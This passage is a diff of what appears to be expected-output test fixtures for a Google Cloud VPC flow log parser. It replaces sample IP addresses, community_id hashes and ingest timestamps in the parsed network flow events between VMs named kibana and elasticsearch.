ubnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391232500Z", + "original": 
"{\"insertId\":\"ut8lbrffooxzc\",\"jsonPayload\":{\"bytes_sent\":\"34509840\",\"connection\":{\"dest_ip\":\"10.49.136.133\",\"dest_port\":46864,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":9243},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:29.432367659Z\",\"packets_sent\":\"8690\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"start_time\":\"2019-06-14T03:40:17.343890802Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:17.343890802Z", "end": "2019-06-14T03:49:29.432367659Z", @@ -1549,17 +1549,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 34836, "bytes": 1467, - "ip": "203.0.113.12", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:LQLr5Clnxf10OYhT92IBepyH/y0=", + "community_id": "1:qoQEykwJ/Fqctc/3YyFJSUPTETc=", "bytes": 1467, "transport": "tcp", "type": "ipv4", @@ -1573,7 +1573,7 @@ }, "related": { "ip": [ - "203.0.113.12", + "67.43.156.13", "10.87.40.76" ] }, 
@@ -1598,8 +1598,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868444300Z", - "original": "{\"insertId\":\"ut8lbrffooxz7\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.12\",\"src_port\":34836},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:39.076420731Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:38.961050187Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391238100Z", + "original": 
"{\"insertId\":\"ut8lbrffooxz7\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34836},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:39.076420731Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:38.961050187Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:48:38.961050187Z", "end": "2019-06-14T03:48:39.076420731Z", @@ -1620,10 +1620,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -1637,7 +1637,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:9htI9XhB+GFEM8rmtAiskiLz++Y=", + "community_id": "1:inP0peZrjQuMumAL2dZH5u0O354=", "bytes": 63671, "name": "default", "transport": "tcp", @@ -1660,7 +1660,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -1696,8 +1696,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868447600Z", - "original": "{\"insertId\":\"ut8lbrffooxyu\",\"jsonPayload\":{\"bytes_sent\":\"63671\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33554},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"367\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500506974Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391243800Z", + "original": 
"{\"insertId\":\"ut8lbrffooxyu\",\"jsonPayload\":{\"bytes_sent\":\"63671\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33554},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"367\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500506974Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500506974Z", "end": "2019-06-14T03:49:59.565311154Z", @@ -1720,9 +1720,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65320, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -1736,7 +1736,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:aNFZC/smfQa37MQsZfMmP5cD6PE=", + "community_id": "1:35LvCkME5lZSqhiM4O+MxjttWtA=", "bytes": 51075, "transport": "tcp", "type": "ipv4", @@ -1751,7 +1751,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { 
@@ -1775,8 +1775,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868450800Z", - "original": "{\"insertId\":\"ut8lbrffooxyv\",\"jsonPayload\":{\"bytes_sent\":\"51075\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65320,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220714119Z\",\"packets_sent\":\"608\",\"reporter\":\"SRC\",\"rtt_msec\":\"220\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.560917237Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391249300Z", + "original": 
"{\"insertId\":\"ut8lbrffooxyv\",\"jsonPayload\":{\"bytes_sent\":\"51075\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65320,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220714119Z\",\"packets_sent\":\"608\",\"reporter\":\"SRC\",\"rtt_msec\":\"220\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.560917237Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.560917237Z", "end": "2019-06-14T03:49:56.220714119Z", @@ -1797,10 +1797,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33562, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -1814,7 +1814,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:oDThWwe999DZ+ToL+uXcjZRio7c=", + "community_id": "1:zUvAQSLCTNOIkUn3aNG0HbYxPv8=", "bytes": 197840, "name": "default", "transport": "tcp", @@ -1837,7 +1837,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -1873,8 +1873,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868453900Z", - "original": "{\"insertId\":\"ut8lbrffooxz0\",\"jsonPayload\":{\"bytes_sent\":\"197840\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33562,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.393910944Z\",\"packets_sent\":\"258\",\"reporter\":\"SRC\",\"rtt_msec\":\"192\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074897435Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391254800Z", + "original": 
"{\"insertId\":\"ut8lbrffooxz0\",\"jsonPayload\":{\"bytes_sent\":\"197840\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33562,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.393910944Z\",\"packets_sent\":\"258\",\"reporter\":\"SRC\",\"rtt_msec\":\"192\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074897435Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074897435Z", "end": "2019-06-14T03:49:56.393910944Z", @@ -1889,8 +1889,8 @@ }, "destination": { "port": 9243, - "address": "203.0.113.93", - "ip": "203.0.113.93" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "source": { "address": "10.49.136.133", @@ -1904,7 +1904,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Y9ynsBV313F1oc4DGZ0sYBcNoQA=", + "community_id": "1:j0PdUfLhQ/r+kYCVQX20c/nfCSc=", "bytes": 173805495, "transport": "tcp", "type": "ipv4", @@ -1919,7 +1919,7 @@ "related": { "ip": [ "10.49.136.133", - "203.0.113.93" + "67.43.156.13" ] }, "gcp": { 
@@ -1943,8 +1943,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868471400Z", - "original": "{\"insertId\":\"ut8lbrffooxys\",\"jsonPayload\":{\"bytes_sent\":\"173805495\",\"connection\":{\"dest_ip\":\"203.0.113.93\",\"dest_port\":9243,\"protocol\":6,\"src_ip\":\"10.49.136.133\",\"src_port\":46864},\"end_time\":\"2019-06-14T03:49:58.716492806Z\",\"packets_sent\":\"44438\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:17.306085222Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391260300Z", + "original": 
"{\"insertId\":\"ut8lbrffooxys\",\"jsonPayload\":{\"bytes_sent\":\"173805495\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":9243,\"protocol\":6,\"src_ip\":\"10.49.136.133\",\"src_port\":46864},\"end_time\":\"2019-06-14T03:49:58.716492806Z\",\"packets_sent\":\"44438\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:17.306085222Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:17.306085222Z", "end": "2019-06-14T03:49:58.716492806Z", @@ -1971,17 +1971,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 33478, "bytes": 1468, - "ip": "203.0.113.12", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Eav+HA4T0zQk7MDzMdHH6Hhsx2A=", + "community_id": "1:Wa+aonxAQZ59AWtNdQD0CH6FnsM=", "bytes": 1468, "transport": "tcp", "type": "ipv4", @@ -1995,7 +1995,7 @@ }, "related": { "ip": [ - "203.0.113.12", + "67.43.156.13", "10.87.40.76" ] }, 
@@ -2020,8 +2020,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868477300Z", - "original": "{\"insertId\":\"ut8lbrffooxyx\",\"jsonPayload\":{\"bytes_sent\":\"1468\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.12\",\"src_port\":33478},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:37.301953198Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:37.186193305Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391265900Z", + "original": 
"{\"insertId\":\"ut8lbrffooxyx\",\"jsonPayload\":{\"bytes_sent\":\"1468\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33478},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:37.301953198Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:37.186193305Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:45:37.186193305Z", "end": "2019-06-14T03:45:37.301953198Z", @@ -2042,10 +2042,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33548, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -2059,7 +2059,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:komMvAI/1VsC7c9d9LuzM29I9NY=", + "community_id": "1:+S3/6PF+UXU7wlJD68HIrz0Mo6c=", "bytes": 159704, "name": "default", "transport": "tcp", @@ -2082,7 +2082,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -2118,8 +2118,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868481500Z", - "original": "{\"insertId\":\"ut8lbrffooxz4\",\"jsonPayload\":{\"bytes_sent\":\"159704\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33548,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.393651211Z\",\"packets_sent\":\"241\",\"reporter\":\"SRC\",\"rtt_msec\":\"50\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147252064Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391271600Z", + "original": 
"{\"insertId\":\"ut8lbrffooxz4\",\"jsonPayload\":{\"bytes_sent\":\"159704\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33548,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.393651211Z\",\"packets_sent\":\"241\",\"reporter\":\"SRC\",\"rtt_msec\":\"50\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147252064Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.147252064Z", "end": "2019-06-14T03:49:56.393651211Z", @@ -2148,17 +2148,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65320, "bytes": 70775, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 732 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:aNFZC/smfQa37MQsZfMmP5cD6PE=", + "community_id": "1:35LvCkME5lZSqhiM4O+MxjttWtA=", "bytes": 70775, "transport": "tcp", "type": "ipv4", @@ -2172,7 +2172,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -2197,8 +2197,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868486200Z", - "original": "{\"insertId\":\"ut8lbrffooxz3\",\"jsonPayload\":{\"bytes_sent\":\"70775\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65320},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220714119Z\",\"packets_sent\":\"732\",\"reporter\":\"DEST\",\"rtt_msec\":\"220\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.560917237Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391277200Z", + "original": 
"{\"insertId\":\"ut8lbrffooxz3\",\"jsonPayload\":{\"bytes_sent\":\"70775\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65320},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220714119Z\",\"packets_sent\":\"732\",\"reporter\":\"DEST\",\"rtt_msec\":\"220\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.560917237Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.560917237Z", "end": "2019-06-14T03:49:56.220714119Z", @@ -2225,18 +2225,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 281147, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": 